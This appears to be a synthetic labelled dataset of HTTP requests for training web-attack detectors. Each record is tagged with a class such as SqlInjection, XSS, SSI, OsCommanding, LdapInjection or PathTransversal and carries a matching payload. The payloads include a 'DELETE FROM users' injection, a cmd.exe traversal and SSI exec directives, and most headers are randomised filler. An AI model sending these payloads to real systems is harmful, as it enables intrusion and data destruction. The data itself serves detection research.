TE: chunked;q=0.5,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: nnQn8.D http://www.zDer.com
UA-CPU: x86
UA-Disp: 484,9177,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 199x6158
Via: 1.0 www.AntEao.html:48
Transfer-Encoding: gzip
Upgrade: ogtr/7.3, ctr/1.8, dTuD/9.4, yoltsN/4.0, nt5ae/6.4
Warning: 755 www.rpcofa7.png "taotesry9p" 
X-Forwarded-For: 92.181.164.255
X-Serial-Number: 36797879465846791
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43554
Start - Id: 36666
class: OsCommanding
GET /5enEoUml8FtNnti1e5al/hry2n2atA/ea2mkRcHT6/csool/rv3LQ4.QnrJ1kmmk-eBm/5qlikeLQOf8CLs7-S1.php?Siannlai0Gfes=3498579&urrEb8ebs=r&eoe=nN_&kdos9chlfhetor=soaneo8aqi7oonmur&mn6ijaNuCts=8ehobjectnbeHa&ettl8siDs=%7C+dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++%2C&bsbiw=513&iNaerisolhtsg=2639320&fdezHAonrioixgs=cautoexecvbscript%26l&92luny3lt2=679&eisE0ner=y%5Cre%3Ejby&passthruq3MaqaG=eHgn%29i&uNrau=a&ttokpair=-homej&eilf2ctrl3=eSjpZAr HTTP/1.1
Host: 11.235.217.172:80
Connection: keep-alive
Accept: video/*;q=0.4, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Cookie: eefh4cSihmx=cleyncrewttnAe
Date: Sat, 27 Jun 09 10:51:38 UTC
ETag: W/"VTXGptc-UHZGngv"
If-Unmodified-Since: Fri, 01 Jul 05 05:50:41 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Feb 07 16:38:29 CET
Proxy-Authorization: Basic OGQ1UmlxOmxiZGVhZQ==
Authorization: Basic aWZSaWRkZnM6eGFpYXFu
Referer: /fu8e/sndHt/msgiMn/cvtlvi.htm
User-Agent: Mozilla/9.6 (Windows; U; Win98 2.3; ms-ni; rv:8.4.1) Gecko/69903043
Via: HTTP/2.7 240.18.144.237:494
Transfer-Encoding: deflate
Upgrade: 0npezt/5.5, aaetn/0.7, gsT/9.2, 7dniE/9.5
Warning: 021 www.inh3tr0.js "iqgaes" 
----: ----------------------------------------

null

End - Id: 36666
Start - Id: 40592
class: SSI
GET /aQ33n4vPPy/Sydd013Az1IcRdocument.php4?od9i=%3C%21--%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&soisj=3625695&peSierO6e9ludoc=+E%5C%3Awtssa+0bataoafa&uuH5a0letaFe=p%266i544s0ilccr&rf0Uowno=etmacrcdiiwhb&hiedtcdenD=%24%3Esod%25%26bED%3Dcopyu+%2Bp&7nrsiqXsosyRd=50025831 HTTP/1.1
Host: 235.245.179.158:910
Connection: close
Accept: image/*;q=0.9, application/*;q=0.3, video/*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 134.133.165.209
Cookie: DnxwL=3;jjimeeiwha=tsiro3mtd7obadr8ls;1tin7trW=732228;iEnaodfteut=v4rrs;SK6xHXsfl=ta
Cookie2: $Version="59"
Date: Wed, 27 Sep 06 14:48:56 GMT
ETag: W/"bb110ijb0AjJQj0"
Expect: Hnueo
From: nIlswt@riaoa.ch
If-Modified-Since: Sun, 30 Mar 08 22:07:43 GMT
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: "r.qmsgU9YSV436@hn"
If-None-Match: *
If-Range: Thu, 22 Apr 04 24:44:13 GMT
Max-Forwards: 4004
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest qop=ccHTr
Range: -4
Referer: http://www.inegUaan.org/sTu8/h5nedu/fedn/njyB0e.sh
TE: gzip;q=0.3
Trailer: Warning
User-Agent: Mozilla/2.3 (Windows; U; Win98 3.1; do-cs; rv:9.5.8) Gecko/17582474
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5535x2253
Via: lwd/7.8 107.67.7.93, FTP/8.6 99.147.225.6:37
Transfer-Encoding: deflate
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40592
Start - Id: 41558
class: SqlInjection
GET /dtcac/iF0Ko7Y4/agJqE8DlQu_7/gsha9aje1It.php?hlr27eu5tg4iaa=4te%27++++%29%3B+++DELETE+FROM++users++++WHERE+++++upper%28username%29++%3D+++++upper%28++++%27admin&TF1XVi8qbody1z=%3Es HTTP/1.0
Host: www.uniedso.ch:82309
Connection: 049jfdG
Accept: */*
Accept-Charset: windows-874;q=0.9, cp-932;q=0.1, iso-8859-9;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: d-lDmhaitn, wrcrs-onte, ytsv-aesn;q=0.8
Cache-Control: max-stale
Client-ip: 83.99.184.79
Cookie: oataja=11;crnl8f1r6=alogs1txvar&nn ui;rhal=o=ot:;rpp=actthiueamyerc;lhtaccesoM9brcp6WfjL=saxGUGKZXlQ;oIeeuaormhOMk=%u(tsleve9hlee
Cookie2: $Version="9"
Date: Tue, 21 Aug 07 18:18:15 GMT
Expect: vnri
From: usaacy07@scsi6.be
If-Modified-Since: Sat, 16 May 09 01:25:08 GMT
If-Unmodified-Since: Tue, 05 Jan 10 16:23:31 UTC
If-Match: *
If-None-Match: "uPLbWqf_LxolL2Yj"
If-Range: "cuie_VRY0vXsgDUTxrZU"
Max-Forwards: 6230
MIME-Version: 4.7
Pragma: n=lew7a
Proxy-Authorization: NTLM ZWVpdXM4bnZlckFpYW5tMXRoY3JicjJwZEd0TG91bnlBV2F4dXM=
Authorization: Basic VDBkZTphbzNUaGM=
Range: 4-728143
Referer: /suotsm/h4Eol/ehlray8r/aYuhtc3g.mpeg
TE: gzip,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: tRls/9.6
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1852x515
Via: HTTP/1.3 www.ehFYs7ne.shtml, 0.4 18.45.192.180, FTP/4.9 39.166.25.99
Transfer-Encoding: efaLut
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 868 212.59.150.87 "tTe6e" "Fri, 15 May 09 11:43:43 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------

null

End - Id: 41558
Start - Id: 47870
class: XSS
GET /mZKlrskjNeFTIMzH/Otpnaalt4itiwmi/etaelietoeeiorx/eeler3tee24areaT.dll?tmpHDIW=%28l3&re6e=848225&aspciaicpyi=07606480&iant4wsnacfs7i=n75ctlnzesn&doawiieiallp=fo&ahmu8=%3Cbgsound+src++%3D+%22++javascript%3A++++%5Balert+++%28%27srmwrharhF%27%29%3B%5D+++%22%3E&in=inm&VtVZposition5bu0=aSnhoA&eAOsscneeo=kone&.0aak4=ntf302ootmhAnfeoh HTTP/1.0
Host: 34.82.219.191:80
Connection: Aeaaaio
Accept: text/*, audio/*;q=0.2, text/xml;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.2, compress, deflate;q=0.1, identity;q=0.3
Accept-Language: *;q=0.9
Cache-Control: min-fresh=178
Client-ip: 110.70.167.237
Cookie: Xjmailretc8lincludeAE=8jamh +inputlogchp)$oh~sprocessing-instruction;piDLr81sKaon=DUtsf
Cookie2: $Version="8"
Date: Mon, 29 Jun 09 08:07:09 GMT
ETag: "jyvTDLdVK3kRRBHcIa"
Expect: hhr4=sfe1
From: wu4c60i@McindieetT.fr
If-Modified-Since: Wed, 13 Aug 08 08:01:55 GMT
If-Unmodified-Since: Fri, 08 Jun 07 08:21:19 GMT
If-Match: *
If-None-Match: "uWgmd0ocJMciF1VU"
If-Range: "gI9m98@iivJ-4YmZAa8"
Max-Forwards: 716
MIME-Version: 9.4
Pragma: ltsOa4ai=3hplmear
Proxy-Authorization: 94wiw ilu2a=emsx
Authorization: Basic ZW9hZU5zcDpzYmFpZXc=
Range: 541-3,060-23987,670-3
Referer: http://glrssego.gov/ahoowhnz/waDe/b89o.mdb
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 8.4; 7s-en; rv:2.2.7) Gecko/69268942
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: Rmveb/7.9 25.177.125.9, 8.6 www.tbr0By.shtml
Transfer-Encoding: deflate
Upgrade: DilEe/7.0, ibtxn/3.8, a7else/8.2
Warning: 307 50.130.247.108 "2mlin3oeoesToap" "Mon, 23 Feb 04 03:39:06 GMT"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47870
Start - Id: 37238
class: LdapInjection
GET /ieXFvMNXXbxICx.htm?processing-instructionApBZ.Qs4.=657%29%28%26%28objectClass%3Dege%29%28%7C%28sn+%3D++++ze%29%28cn%3Dtf+++++J*%29%29 HTTP/1.0
Host: 157.12.247.223
Connection: close
Accept: */*;q=0.9
Accept-Charset: utf-8, koi8-r;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 47.19.215.50
Cookie: 4so1nOUlrheo=3339337;rmtstd=3y1o;ErvttemeAnd0=tsglio;eUttnHrecqseeoe=d6NUt3lkDbRF
Cookie2: $Version="79"
Date: Sun, 04 Jun 06 01:44:31 GMT
ETag: "6rrN9a41Ue-7eg8e0W0"
Expect: nnsar
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Tue, 21 Nov 06 04:11:53 CET
If-Match: "NL2X7@61VdelnlGgi"
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 4444
MIME-Version: 2.4
Pragma: vtXR=t
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: NTLM cm5pdG5lZG9pMGF0ZXRucnVsbmxtd3hlck9vc2hjZXRvSWplZXRvdA==
Range: 38889-,402727-278555
Referer: /oemohthy.html
TE: deflate
Trailer: Via
User-Agent: ni0mkz http://www.tSenac1.org
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37238
Start - Id: 44069
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.uOnaifd.gov:68
Connection: close
Accept: audio/basic;q=0.4, video/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, compress, deflate
Accept-Language: 2suaeree-yideeir;q=0.8, n-6onie0t, 6RinP-se, 0ntttN-x0r3pri, es6iR-egsgo
Cache-Control: no-store
Client-ip: 103.148.81.42
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="167"
Date: Fri, 03 Mar 06 23:34:06 CET
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Wed, 04 Jul 07 16:51:37 GMT
If-Unmodified-Since: Sat, 12 May 07 06:18:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -6,-7
Referer: http://www.s7wu2Inm.st/knhjs5/ahy7mch/ahebce.msf
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.0 (compatible; Konqueror/7.9; Win98; tl0rh0)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: aLaheo/0.2, meI/8.9
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44069
Start - Id: 42726
class: SqlInjection
POST /eb82i3iec/loThiUq@d-Ng.htm? HTTP/1.0
Content-Length: 133
Content-Language: Sp,cUseA
Content-Encoding: deflate
Content-Location: http://www.siisiw2.fr/7rise9i/ddoq/feqc7ng/itaa3sit/tH5TN.bin
Content-MD5: WmQyYWFuZDh0a2hldGhwZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 05:40:48 CET
Last-Modified: Tue, 08 Nov 05 06:20:35 UTC
Host: 213.204.244.102
Connection: close
Accept: image/gif;q=0.4, image/png;q=0.4, video/mpeg
Accept-Charset: euc-cn, iso-8859-1, iso-8859-15;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: oRi9='nb'
Client-ip: 90.28.189.51
Cookie: 6EzNVsge2lX= urfeMhtacceslw
Cookie2: $Version="258"
Date: Tue, 23 Oct 07 11:58:39 UTC
ETag: "Z0vkKHY8I-oXsMUEv"
If-Unmodified-Since: Mon, 08 Sep 08 12:03:14 UTC
If-Match: *
If-None-Match: "NBLvneg27-nVwRj"
If-Range: *
Max-Forwards: 74
Pragma: no-cache
Authorization: Digest qop=auth-int
Referer: /38tefeF.tar
User-Agent: '   group    by    users.id     having    181=181
UA-CPU: x86
UA-Disp: 0603,672,16
Via: HTTP/0.8 www.hLc4wlE.jpg
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

nsTin5olfm=d+cmdxroah&gypjtifr=847570&LQnetcat35kjmnc0U=228833409&ttmbrdc48sl=10&ysamchildPselectW=i1Teet&vwindow.openVxmlvSPPjv=51

End - Id: 42726
Start - Id: 47664
class: XSS
GET /i49ILeeoasea/accept0z1olj5eEDOformL/pFTaF4Z9/8mtyikDoUzt4/rw/g.-mYHf@Spp/ta2iresmoashhvh7t/@-WZK4XVSZQiframe0/e6aOnnWtr.swf?nwewptsslw=52014012&nt=18&eis0jAm=%3C%21--+--+--%3E%3Cscript+%3E%5Balert+++%28%27eoipyAgNue%27%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E&z8tbSadl=e+g8xeohnelap7x HTTP/1.1
Host: 15.66.44.144
Connection: eulMeo
Accept: application/*;q=0.8, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: ea6eab=h
Client-ip: 39.154.184.38
Cookie: Lhea=2438;gyyp7biehlge=Ltwh;mtexs=4163
Cookie2: $Version="8"
Date: Mon, 11 May 09 14:32:29 UTC
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Mar 09 07:21:07 UTC
If-Unmodified-Since: Sat, 06 Feb 10 09:42:22 CET
If-Match: *
If-None-Match: *
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 71
MIME-Version: 7.7
Pragma: liit=zhf0ti3N
Proxy-Authorization: bxdtp1 pwtsrI=RoiSgk
Authorization: NTLM dDJwYUx1aUV4dXNzdGh3ZTduVFdyaW9wYTZ1ZnR0b2hkb2FvdHFhQ3Bob2xzcg==
Range: -017,-1,-32
Referer: http://lf1S.org/tehiE4wi/hc7chl/fthahl.dll
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 4.0; of-12; rv:1.5.3) Gecko/18897380
UA-CPU: 68000
UA-Disp: 434,760,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7165x674
Via: 2.4 211.31.11.182, 2.6 231.76.26.159:681
Transfer-Encoding: deflate
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47664
Start - Id: 45114
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: 136.160.189.215
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: compress, identity, identity;q=0.4
Accept-Language: sSaqtc-hhms, 5htcsm3-o;q=0.7, Pskire-elxAetDn;q=0.0
Cache-Control: no-transform
Client-ip: 188.12.230.231
Cookie: hu=7606777;AGo3YSdborr46=o;oEdp=artbsk8zb;ieehidOlthe0=uhuhNt6ucttri
Cookie2: $Version="70"
Date: Wed, 12 Oct 05 04:47:53 CET
ETag: W/"_UGzLEzbkSj@N8PU."
Expect: uhxrdEf=ynXs4rl3
From: nsarxd@yvorsnirh0.be
If-Modified-Since: Fri, 16 Nov 07 06:27:34 UTC
If-Unmodified-Since: Tue, 20 Apr 10 20:45:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: /biir.html
TE: trailers
Trailer: Referer
User-Agent: 6eybeoCsio (3-xuwu; bxJX.Rlah; eshU73pJ; k9g4mAr)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: HTTP/5.7 www.twtBe.html, 5.7 162.246.250.192
Transfer-Encoding: gzip
Upgrade: nu7ne/3.2
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 785532867
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45114
Start - Id: 45734
class: PathTransversal
GET /rhhQe3amedntfTpw0z/nW2d.8v@lq6_wceSlJ0/iB_ItGvLXc0raPXGa/echo6ihTw/r74suds/tna4mseay82/wNf2kFm1hbkCD/i0tzc3eeaifiHeGhes.html?tevmogo4el=Mn&u4ortopar=%3Bdocumentl&IMienewi=ytupdate%5DfG%27%3E7i4c&hgtjbo=871012066&aiei3neerhUH=e8fc52w4Wu7&oeta1mtadsc=035&laptTfo=eXEB7&lcra=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&aatp1=029&ma7Mde=ytnboot.iniE&0iEkygonwReOqs=elmkuabLt HTTP/1.1
Host: 180.247.201.142
Connection: sisnplhi
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: iod=aAitfcy
Client-ip: 195.187.195.167
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sat, 23 Jan 10 04:37:21 GMT
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: id9Eem@Ce2rja.fr
If-Modified-Since: Tue, 08 Sep 09 13:36:42 CET
If-Unmodified-Since: Wed, 15 Oct 08 02:24:39 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 94
MIME-Version: 4.6
Pragma: d='Yfiftr4'
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: /1zede/nltnm/bjien/ubttd/il1h.bin
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: Olnsfde (aFPxM@D; u9dZ775BhS; cmIyagg_N)
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: 8.2 234.125.69.23, 0.5 www.cne4s4.html
Transfer-Encoding: identity
Upgrade: gise/4.4, ekas/4.1, Clis/0.2
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 8691156680012
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45734
Start - Id: 40318
class: SSI
GET /jgVfG6DJi5BxJLwPFvt/fB6Vr@BibZe-/iyeezlrcIeyea/tl/tAc/sO698GiFQMdw@Y.js?dsI=%3C%21--+%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CoOd%5Cbe%5Conbl.exe+++++d%3A%5C7rdTngrri%5Cwww.ntilan.org%5CexnaCfeeq%5Cdatabase.mdb+++%2Fx++exporttofoxpro%22--%3E&iarat=unehstvEa&MYaTtmpa=h%24i&bdDtM@XmailO=snscte4eOayuksui HTTP/1.0
Host: 11.239.58.56:80
Connection: 6eio
Accept: image/*, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: qez-yg, faUs-a, yeLoeieh-hE8arn, M-cN;q=0.8, eEcj-5;q=0.0
Cache-Control: only-if-cached
Client-ip: 239.88.55.52
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Tue, 09 Mar 10 18:10:14 UTC
ETag: W/"BreSvbANyEzg2vf5"
Expect: uesime7x
From: rpic1ucn@6o6hir.ch
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Mon, 16 Oct 06 19:28:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Nov 06 06:04:27 UTC
Max-Forwards: 7
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: tuinwa rtetnaLo=neheibee
Range: -2115,0045-233,-51
Referer: /lna2llti/eisn3pU.exe
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 6.3; sr-yu; rv:1.1.9) Gecko/67616137
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8587x911
Via: HTTP/5.5 156.205.173.200, 4.5 www.ntwtpo.jpeg, 5.1 205.130.212.131
Transfer-Encoding: tSeat
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 196 2.26.22.3:993 "ye78torehxsveoUeewSd" 
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40318
Start - Id: 40601
class: SSI
GET /rl/idniOhstes8y1y.msf?ur7afo=%3C%21--+++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.1
Host: 53.192.252.196:80
Connection: Tdet
Accept: */*
Accept-Charset: utf-7, us-ascii
Accept-Encoding: deflate;q=0.8, compress, identity;q=0.5, gzip;q=0.6
Accept-Language: i9sOb-bc0iili, 4rit-axbu;q=0.5
Cache-Control: raogzs='rott'
Client-ip: 134.30.107.102
Cookie: eeet4pq=5QoAT2lFG;jdeletesfUe=aastynoG;js=qoehr;ccenha=8
Cookie2: $Version="0"
Date: Sun, 13 Dec 09 22:53:42 GMT
ETag: W/"WW71N8tHho3K3sd@"
Expect: 100-continue
From: nahti@Onishessl.uk
If-Modified-Since: Wed, 01 Jul 09 03:49:32 UTC
If-Unmodified-Since: Fri, 04 Jul 08 02:15:16 UTC
If-Match: "KSXX4-Ok5MEMI62n3hm"
If-None-Match: "vJ_oSK_cN79jMGAY"
If-Range: ".hirn7vA8bFml_5T2"
Max-Forwards: 5600
MIME-Version: 8.9
Pragma: eoaoasf=ebrelYNt
Proxy-Authorization: Digest algorithm=ekoie
Authorization: sx193t H0ees=scnstih
Range: -476
Referer: http://ashtin.it/scdt.jsp
TE: chunked;q=0.0,deflate,gzip
Trailer: Warning
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 5.0; et-nn; rv:1.7.4) Gecko/27207378
UA-CPU: PowerPC
UA-Disp: 953,006,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7337x662
Via: FTP/0.5 www.eesBit.gif:382
Transfer-Encoding: compress
Upgrade: awe/2.0, seeicn/1.1, irwd1t/6.6
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 55192
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40601
Start - Id: 46711
class: XSS
GET /jeveyE8h/nn.pl? HTTP/1.0
Host: www.tdmiteNeo.gov:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: daatte1f-enhw
Cache-Control: max-age=973
Client-ip: 8.1.3.78
Cookie: 2TPenullq=6WUA2YAcn;p1ua=e)g?evalv;mhRteetsiv=oI/selectsRakoot$;mur8yrnvetih=ifbblcusr;iuEze0=o o;geknn1Iteil0=javascript:   alert   (  "     fe.i0lt")
Cookie2: $Version="61"
Date: Wed, 01 Feb 06 08:35:32 CET
ETag: W/"ucV4L6P8pp.RXLcdguPN"
Expect: 100-continue
If-Modified-Since: Wed, 19 Jan 05 04:02:45 CET
If-Unmodified-Since: Sun, 23 Jan 05 13:15:54 GMT
If-Match: "ho0Y9uOAF_3pkF1.s"
If-None-Match: "hlrCIqqAFrF4NzWcp"
If-Range: Sun, 11 Mar 07 09:03:07 CET
Max-Forwards: 22
MIME-Version: 6.9
Pragma: utnbCysF=nw
Proxy-Authorization: NTLM cnVpaWVhNG1kaWl2aTJ0bWQ4QW1uNmxiYzZkN3Q5Qm53dHRuczhvdExyc2k=
Authorization: NTLM bTAxY3R2ZTVlN3NsaWg1RWxzYmVRYXNlczlhaWVzQWFy
Range: 42963-61
Referer: http://www.eWs85id.uk/srhg/7oql/ifyas/tsrma.jpg
TE: trailers,trailers,gzip
Trailer: If-Modified-Since
User-Agent: Cda7e7zerrtavt
UA-CPU: x86
UA-Disp: 4598,3171,32
UA-Pixels: 622x110
Via: 3.3 58.62.193.164:399, HTTP/5.6 www.1htvbio.tiff, HTTP/9.8 24.74.93.206
Transfer-Encoding: compress
Upgrade: F3sd/8.1, dyn/3.0, ser/7.5
Warning: 946 www.roit.css "gwtlahs9th4ae" "Fri, 11 Nov 05 18:35:56 CET"
X-Forwarded-For: 40.45.63.28
X-Serial-Number: 5203423
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46711
Start - Id: 35379
class: SqlInjection
GET /a2f/ecRnRsnanse/6AtelnetILVlsXk-adminTn/tinnnsrecmkg5jeeeL/eXCPgKGH-s8tMDSl6/8dAoidOXt/tYG/G@jautoexecBrmJaiPYrE/nrdndmleio.png?having7BUWA2dy=winntdIahewo&elbc6e=5&5T=%3CShselectrcpEol2&rtvhe=OR++%27zidm%27+%3D+++++%27+++++%27&bt7ddQkca7i=wXV1gPZ.BB HTTP/1.0
Host: 203.206.132.86
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate, gzip, compress;q=0.7, compress;q=0.4
Accept-Language: la6uo-oY, hostsntW-osht;q=0.5
Cache-Control: aef='dtAu'
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Wed, 09 Feb 05 23:13:58 CET
ETag: W/"YrySjLvL9c7uR21"
Expect: eeosm=3uereXt
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: "ZZ8Aq7akGRPuQnNd771"
If-Range: Sat, 06 May 06 18:07:06 UTC
Max-Forwards: 6
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: y6tcst 0nr7H=5ongnato
Authorization: Basic UWJvdWFuZTpob3N1Wg==
Range: 187-
Referer: /0f33/LrHhppre/mirxy/ea0em.pl
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: 8tp2aneoo/1.7
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: reoej
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35379
Start - Id: 44889
class: PathTransversal
